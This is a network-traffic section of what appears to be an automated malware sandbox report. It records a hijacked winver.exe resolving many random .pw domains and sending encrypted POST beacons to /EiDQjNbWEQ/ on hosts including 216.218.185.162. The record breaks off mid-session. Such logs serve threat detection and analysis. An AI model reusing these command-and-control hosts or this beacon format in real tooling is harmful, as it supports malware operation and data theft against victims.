                                                                                                                                                                                        Dec 22, 2023 21:31:48.959671974 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:48.959911108 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:48.965379000 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.167006969 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.167076111 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.368465900 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369072914 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369086027 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369282007 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369642019 CET4974480192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:49.571001053 CET8049744216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.226514101 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.428354025 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.428479910 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.428587914 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.629724979 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.629816055 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.832439899 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.832914114 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.832963943 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:50.833229065 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:50.833509922 CET4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:51.041887999 CET8049745216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:51.852108002 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.053277016 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.053369045 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.053474903 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.254337072 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.254502058 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.455352068 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456151009 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456187010 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456392050 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456672907 CET4974680192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:52.657572985 CET8049746216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:53.539206982 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:53.739938974 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:53.740031958 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:53.740170002 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:53.940859079 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:53.940949917 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:54.141681910 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143640041 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143652916 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143812895 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:00.129364014 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:00.179281950 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:06.119223118 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:06.163676023 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:12.157475948 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:12.210448027 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:18.121309042 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:18.163656950 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:24.172709942 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:24.226090908 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:30.113518953 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:30.163626909 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:36.151500940 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:36.197509050 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:42.219223022 CET8049748216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:32:42.273081064 CET4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:32:48.476336002 CET8049748216.218.185.162192.168.2.4
Dec 22, 2023 21:32:48.522964001 CET | 49748 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:32:54.267589092 CET | 80 | 49748 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:32:54.319819927 CET | 49748 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:33:00.311059952 CET | 80 | 49748 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:33:00.366671085 CET | 49748 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:33:06.116039038 CET | 80 | 49748 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:33:06.163608074 CET | 49748 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:33:12.149950981 CET | 80 | 49748 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:33:12.194816113 CET | 49748 | 80 | 192.168.2.4 | 216.218.185.162
Dec 22, 2023 21:33:18.203957081 CET | 80 | 49748 | 216.218.185.162 | 192.168.2.4
Dec 22, 2023 21:33:18.257354021 CET | 49748 | 80 | 192.168.2.4 | 216.218.185.162
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2023 21:31:01.116009951 CET | 54275 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:01.622597933 CET | 53 | 54275 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:20.780147076 CET | 49653 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:21.184664965 CET | 53 | 49653 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:36.755748034 CET | 51270 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:37.438705921 CET | 53 | 51270 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:38.417537928 CET | 60870 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:39.021545887 CET | 53 | 60870 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:40.017096996 CET | 54773 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:40.528918982 CET | 53 | 54773 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:41.520317078 CET | 65209 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:42.017582893 CET | 53 | 65209 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:42.990463018 CET | 65168 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:43.591897964 CET | 53 | 65168 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:44.840640068 CET | 62311 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:45.191015005 CET | 53 | 62311 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:46.160896063 CET | 53088 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:46.921212912 CET | 53 | 53088 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:47.893970966 CET | 54557 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:48.381458044 CET | 53 | 54557 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:49.370465040 CET | 57702 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:49.860517025 CET | 53 | 57702 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:50.834176064 CET | 61269 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:51.446839094 CET | 53 | 61269 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:52.457361937 CET | 54842 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:52.587080956 CET | 53 | 54842 | 1.1.1.1 | 192.168.2.4
Dec 22, 2023 21:31:52.588097095 CET | 58223 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2023 21:31:53.157351017 CET | 53 | 58223 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 22, 2023 21:31:01.116009951 CET | 192.168.2.4 | 1.1.1.1 | 0xc212 | Standard query (0) | spaines.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:20.780147076 CET | 192.168.2.4 | 1.1.1.1 | 0xc29 | Standard query (0) | uyhgqunqkxnx.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:36.755748034 CET | 192.168.2.4 | 1.1.1.1 | 0x5677 | Standard query (0) | vcklmnnejwxx.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:38.417537928 CET | 192.168.2.4 | 1.1.1.1 | 0xae5a | Standard query (0) | cmnsgscccrej.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:40.017096996 CET | 192.168.2.4 | 1.1.1.1 | 0xd99 | Standard query (0) | evbsdqvgmpph.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:41.520317078 CET | 192.168.2.4 | 1.1.1.1 | 0x842f | Standard query (0) | mfueeimvyrsp.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:42.990463018 CET | 192.168.2.4 | 1.1.1.1 | 0x6d7d | Standard query (0) | utmyhnffxpcj.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:44.840640068 CET | 192.168.2.4 | 1.1.1.1 | 0x466 | Standard query (0) | fkmmvfeonnyh.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:46.160896063 CET | 192.168.2.4 | 1.1.1.1 | 0xf1da | Standard query (0) | gfnlmtcolrrb.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:47.893970966 CET | 192.168.2.4 | 1.1.1.1 | 0xe359 | Standard query (0) | wwgfyvvdtmeq.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:49.370465040 CET | 192.168.2.4 | 1.1.1.1 | 0x5fd9 | Standard query (0) | xtbbpqfrsubt.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:50.834176064 CET | 192.168.2.4 | 1.1.1.1 | 0x4bd | Standard query (0) | vrmtybxxpddg.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:52.457361937 CET | 192.168.2.4 | 1.1.1.1 | 0xacfb | Standard query (0) | rvqlfnedcldh.pw | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:52.588097095 CET | 192.168.2.4 | 1.1.1.1 | 0xd5ab | Standard query (0) | fccfxejgtpqb.pw | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 22, 2023 21:31:01.622597933 CET | 1.1.1.1 | 192.168.2.4 | 0xc212 | No error (0) | spaines.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:21.184664965 CET | 1.1.1.1 | 192.168.2.4 | 0xc29 | No error (0) | uyhgqunqkxnx.pw | | 45.77.249.79 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:21.184664965 CET | 1.1.1.1 | 192.168.2.4 | 0xc29 | No error (0) | uyhgqunqkxnx.pw | | 178.62.201.34 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:21.184664965 CET | 1.1.1.1 | 192.168.2.4 | 0xc29 | No error (0) | uyhgqunqkxnx.pw | | 104.131.68.180 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:37.438705921 CET | 1.1.1.1 | 192.168.2.4 | 0x5677 | No error (0) | vcklmnnejwxx.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:39.021545887 CET | 1.1.1.1 | 192.168.2.4 | 0xae5a | No error (0) | cmnsgscccrej.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:40.528918982 CET | 1.1.1.1 | 192.168.2.4 | 0xd99 | No error (0) | evbsdqvgmpph.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:42.017582893 CET | 1.1.1.1 | 192.168.2.4 | 0x842f | No error (0) | mfueeimvyrsp.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:43.591897964 CET | 1.1.1.1 | 192.168.2.4 | 0x6d7d | No error (0) | utmyhnffxpcj.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:45.191015005 CET | 1.1.1.1 | 192.168.2.4 | 0x466 | No error (0) | fkmmvfeonnyh.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:46.921212912 CET | 1.1.1.1 | 192.168.2.4 | 0xf1da | No error (0) | gfnlmtcolrrb.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:48.381458044 CET | 1.1.1.1 | 192.168.2.4 | 0xe359 | No error (0) | wwgfyvvdtmeq.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:49.860517025 CET | 1.1.1.1 | 192.168.2.4 | 0x5fd9 | No error (0) | xtbbpqfrsubt.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:51.446839094 CET | 1.1.1.1 | 192.168.2.4 | 0x4bd | No error (0) | vrmtybxxpddg.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:52.587080956 CET | 1.1.1.1 | 192.168.2.4 | 0xacfb | Name error (3) | rvqlfnedcldh.pw | none | none | A (IP address) | IN (0x0001) | false
Dec 22, 2023 21:31:53.157351017 CET | 1.1.1.1 | 192.168.2.4 | 0xd5ab | No error (0) | fccfxejgtpqb.pw | | 216.218.185.162 | A (IP address) | IN (0x0001) | false
• https:
  • www.bing.com
• spaines.pw
• uyhgqunqkxnx.pw
• vcklmnnejwxx.pw
• cmnsgscccrej.pw
• evbsdqvgmpph.pw
• mfueeimvyrsp.pw
• utmyhnffxpcj.pw
• fkmmvfeonnyh.pw
• gfnlmtcolrrb.pw
• wwgfyvvdtmeq.pw
• xtbbpqfrsubt.pw
• vrmtybxxpddg.pw
• fccfxejgtpqb.pw
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe
Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:19.712755919 CET | 93 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: spaines.pw
    Content-Length: 157
    Data Raw: fd 32 8e 32 cc 3a 8e 32 13 62 d0 aa fb 30 8f 11 cd 02 be 02 cd 02 be 02
    Data Ascii: 22:2b0
Dec 22, 2023 21:31:19.914130926 CET | 133 | OUT | Data Raw: 00 80 00 00 00 77 ee f1 1d 7b 26 be ec 1a 51 ba f1 d2 a4 d3 f7 e9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 2b e5 1f ab 10 c0 9f 3e 9b 56 54 d5 5e 23 6d 30 c3 16 dd 0c 89 41 b8 b6 37 36 09 f4 e1 97 6c 02 a5 56 f9 15 81 89 de 1a 7f aa f1 02 7f
    Data Ascii: w{&QYg6u#a+>VT^#m0A76lV4[hZ?L]VB68@Mngk(
Dec 22, 2023 21:31:20.115583897 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:20 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 45.77.249.79 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe
Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:35.805907011 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: uyhgqunqkxnx.pw
    Content-Length: 157
    Data Raw: 81 b7 8b db b9 bf 8b db 6f e7 d5 43 87 b5 8a f8 b1 87 bb eb b1 87 bb eb
    Data Ascii: oC
Dec 22, 2023 21:31:36.170080900 CET | 133 | OUT | Data Raw: 00 80 00 00 00 71 e7 f8 13 64 36 a3 b3 01 5e d4 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ce fe 60 56 0c 92 ba b4 15 6a 76 8b 08 97 86 69 a6 93 66 71 df 3b 1e 53 be 0c c9 f1 bc 30 3a 40 02 e8 c1 85 78 a5 b2 db ec df 3d 01 f9
    Data Ascii: qd6^Yg6u#a`Vjvifq;S0:@x=vF,W!yew/aa)G!;rc
Dec 22, 2023 21:31:36.754365921 CET | 75 | IN | HTTP/1.0 200 OK
    Date: Fri, 22 Dec 2023 20:31:36 GMT
    Content-Length: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe
Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:38.006819010 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: vcklmnnejwxx.pw
    Content-Length: 157
    Data Raw: c0 9a d3 e5 f9 92 d3 e5 2e ca 8d 7d c6 98 d2 c6 f0 aa e3 d5 f0 aa e3 d5
    Data Ascii: .}
Dec 22, 2023 21:31:38.208678007 CET | 133 | OUT | Data Raw: 00 80 00 00 00 72 fd fb 18 78 2d a3 a7 00 51 c2 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 16 59 8e 93 a4 3f 00 06 84 08 5d 76 22 d3 7b 9d 3b fe c1 a1 21 5c e4 13 56 bb 19 51 a5 1b 8d bf 78 e0 b1 a8 e9 a0 91 bf 02 d9 5c a6 e8
    Data Ascii: rx-QYg6u#aY?]v"{;!\VQx\<Z0^&@TvHUJ%6r]]Y
Dec 22, 2023 21:31:38.416371107 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:38 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49738 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:39.602699995 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: cmnsgscccrej.pw
    Content-Length: 157
    Data Raw: 4f 34 bc a9 75 3c bc a9 a1 64 e2 31 49 36 bd 8a 7f 04 8c 99 7f 04 8c 99
Dec 22, 2023 21:31:39.807910919 CET | 133 | OUT | Data Raw: 00 80 00 00 00 67 f3 fe 07 72 30 ae a1 09 54 df 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 4a 56 8c 55 6d 6f 02 c4 15 b6 42 b8 82 51 7a 5f c4 d7 c2 67 f8 a6 e5 d1 b1 24 1f 8f 18 bf 8f 7d b2 03 b3 6e fa b4 af 7d cc 52 52 68 ab
Dec 22, 2023 21:31:40.013947964 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:39 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:41.115704060 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: evbsdqvgmpph.pw
    Content-Length: 157
    Data Raw: f4 47 54 60 cf 4f 54 60 1a 17 0a f8 f2 45 55 43 c4 77 64 50 c4 77 64 50
Dec 22, 2023 21:31:41.316890955 CET | 133 | OUT | Data Raw: 00 80 00 00 00 61 e8 f2 07 71 32 bb a5 07 56 ca 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c ee 68 0d 2d 27 76 81 bc 6b 99 dd f0 d2 e8 fb 16 7d 10 41 2e 4b 78 64 98 d0 06 98 d6 73 7d 0e 24 c0 dd 30 36 87 5a 2e 25 ea 6a dd 20 b4
Dec 22, 2023 21:31:41.519004107 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:41 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49740 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:42.585880041 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: mfueeimvyrsp.pw
    Content-Length: 157
    Data Raw: 52 0c 05 15 6e 04 05 15 bc 5c 5b 8d 54 0e 04 36 62 3c 35 25 62 3c 35 25
Dec 22, 2023 21:31:42.787332058 CET | 133 | OUT | Data Raw: 00 80 00 00 00 69 f8 e5 11 70 2a a0 b4 13 54 c9 81 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 33 30 43 e0 16 27 5b 71 92 3a 08 05 11 a8 cc e3 ae 11 34 d3 45 ce 2f 65 7e 0a 46 24 1f ac c0 d2 f0 e9 0a c5 60 32 64 ea ec 88 8b f3 da
Dec 22, 2023 21:31:42.989285946 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:42 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:44.432614088 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: utmyhnffxpcj.pw
    Content-Length: 157
    Data Raw: a4 50 75 f5 98 58 75 f5 4a 00 2b 6d a2 52 74 d6 94 60 45 c5 94 60 45 c5
Dec 22, 2023 21:31:44.637525082 CET | 133 | OUT | Data Raw: 00 80 00 00 00 71 ea fd 0d 7d 2d ab a4 12 56 d9 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 20 72 94 a6 63 8b 6a 3b 4f c7 7b 4b 46 f5 9d a9 9c f2 eb 96 ac d3 fe 20 07 1f 76 5e 88 04 b0 ac 3f ac b3 bd 1f 64 86 a0 54 2b 34 bd 39
Dec 22, 2023 21:31:44.839683056 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:44 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49742 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:45.756023884 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: fkmmvfeonnyh.pw
    Content-Length: 157
    Data Raw: 6d 34 3b 95 50 3c 3b 95 83 64 65 0d 6b 36 3a b6 5d 04 0b a5 5d 04 0b a5
Dec 22, 2023 21:31:45.958293915 CET | 133 | OUT | Data Raw: 00 80 00 00 00 62 f5 fd 19 63 25 a8 ad 04 48 c3 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 9e f8 67 62 55 31 a7 f7 2b ca 24 87 54 3a d0 6d 47 7c 58 51 3f 15 0b e3 e0 00 a1 a1 3e c0 e5 50 50 d1 29 7b 2c 9d 09 68 1b 90 b4 75 b1
Dec 22, 2023 21:31:46.159543037 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:46 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49743 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:47.490220070 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: gfnlmtcolrrb.pw
    Content-Length: 157
    Data Raw: 91 76 5a 68 af 7e 5a 68 7f 26 04 f0 97 74 5b 4b a1 46 6a 58 a1 46 6a 58
Dec 22, 2023 21:31:47.691407919 CET | 133 | OUT | Data Raw: 00 80 00 00 00 63 f8 fe 18 78 37 ae ad 06 54 c8 93 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 1d 51 07 15 09 4b 87 84 91 07 c4 f8 f8 86 f0 1e 9f b9 78 26 e1 59 6b 90 8c db 81 ce 1b 4d 05 3c ab d0 c9 2f 9b d1 29 3d ad f6 d7 28 75
Dec 22, 2023 21:31:47.892774105 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:47 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49744 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:48.965379000 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: wwgfyvvdtmeq.pw
    Content-Length: 157
    Data Raw: ec b1 0c 1d d3 b9 0c 1d 02 e1 52 85 ea b3 0d 3e dc 81 3c 2d dc 81 3c 2d
Dec 22, 2023 21:31:49.167076111 CET | 133 | OUT | Data Raw: 00 80 00 00 00 73 e9 f7 12 6c 35 bb a6 1e 4b df 80 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 68 1b 5c e8 b6 33 52 79 d8 ee 32 0d 69 8e ca eb 26 6a 32 eb fc b1 35 5d 45 9f 4f 1c 04 c0 ff ea 79 3d 03 fd a1 6a 7f e2 ed 04 82 fb ac
Dec 22, 2023 21:31:49.369072914 CET | 156 | IN | HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Fri, 22 Dec 2023 20:31:49 GMT
    Content-Type: application/octet-stream
    Content-Length: 0
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49745 | 216.218.185.162 | 80 | 7344 | C:\Windows\SysWOW64\winver.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2023 21:31:50.428587914 CET | 98 | OUT | POST /EiDQjNbWEQ/ HTTP/1.0
    Host: xtbbpqfrsubt.pw
    Content-Length: 157
    Data Raw: f3 e1 ef cd cc e9 ef cd 1d b1 b1 55 f5 e3 ee ee c3 d1 df fd c3 d1 df fd
